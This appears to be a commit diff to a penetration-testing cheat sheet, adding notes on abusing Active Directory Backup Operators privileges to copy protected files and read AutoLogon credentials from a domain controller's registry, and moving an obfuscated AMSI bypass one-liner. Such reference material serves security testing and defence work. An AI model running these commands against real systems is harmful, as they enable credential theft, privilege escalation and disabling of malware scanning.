AD Groups + PowerShell Defenses

This commit is contained in:
Swissky 2023-02-14 15:13:41 +01:00
parent f1a85f22b9
commit 36e135776f
2 changed files with 85 additions and 17 deletions

View File

@ -92,8 +92,11 @@
- [ADFS - Golden SAML](#adfs---golden-saml)
- [UnPAC The Hash](#unpac-the-hash)
- [Shadow Credentials](#shadow-credentials)
- [Active Directory Groups](#active-directory-groups)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
- [Abusing Schema Admins Group](#abusing-schema-admins-group)
- [Abusing Backup Operators Group](#abusing-backup-operators-group)
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
- [GenericAll](#genericall)
- [GenericWrite](#genericwrite)
@ -2854,6 +2857,7 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
```
## Active Directory Groups
### Dangerous Built-in Groups Usage
@ -2927,6 +2931,42 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
sc \\dc01 start dns
```
### Abusing Schema Admins Group
> The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory.
### Abusing Backup Operators Group
> Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.
This groups grants the following privileges :
- SeBackup privileges
- SeRestore privileges
* Get members of the group:
```ps1
PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse
```
* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege)
```ps1
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege
```
* Retrieve sensitive files
```ps1
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
```
* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive
```ps1
$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64)
$winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
$winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
```
### Abusing Active Directory ACLs/ACEs
@ -4192,3 +4232,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/)
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
* [Pocing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/)

View File

@ -2,26 +2,17 @@
## Summary
* [AMSI](#amsi)
* [AppLocker](#applocker)
* [DPAPI](#dpapi)
* [Powershell](#powershell)
* [JEA](#jea)
* [Anti Malware Scan Interface](#anti-malware-scan-interface)
* [Just Enough Administration](#just-enough-administration)
* [Contrained Language Mode](#constrained-language-mode)
* [Script Block Logging](#script-block-logging)
* [Windows Defender Antivirus](#windows-defender-antivirus)
* [Windows Defender Application Control](#windows-defender-application-control)
* [Windows Defender Firewall](#windows-defender-firewall)
## AMSI
> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content.
Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
```
## AppLocker
@ -48,7 +39,18 @@ Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrep
## Powershell
### JEA
### Anti Malware Scan Interface
> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content.
Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
```
### Just Enough Administration
> Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information.
@ -62,6 +64,7 @@ Breaking out if JEA:
Add-Computer
```
### Constrained Language Mode
Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
@ -110,6 +113,29 @@ Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageM
```
### Script Block Logging
> Once Script Block Logging is enabled, the script blocks and commands that are executed will be recorded in the Windows event log under the "Windows PowerShell" channel. To view the logs, administrators can use the Event Viewer application and navigate to the "Windows PowerShell" channel.
Enable Script Block Loggin:
```ps1
function Enable-PSScriptBlockLogging
{
$basePath = 'HKLM:\Software\Policies\Microsoft\Windows' +
'\PowerShell\ScriptBlockLogging'
if(-not (Test-Path $basePath))
{
$null = New-Item $basePath -Force
}
Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1"
}
```
## Windows Defender Antivirus
Also known as `Microsoft Defender`.
@ -187,3 +213,4 @@ Also known as `WDAC/UMCI/Device Guard`.
## References
* [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf)
* [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3)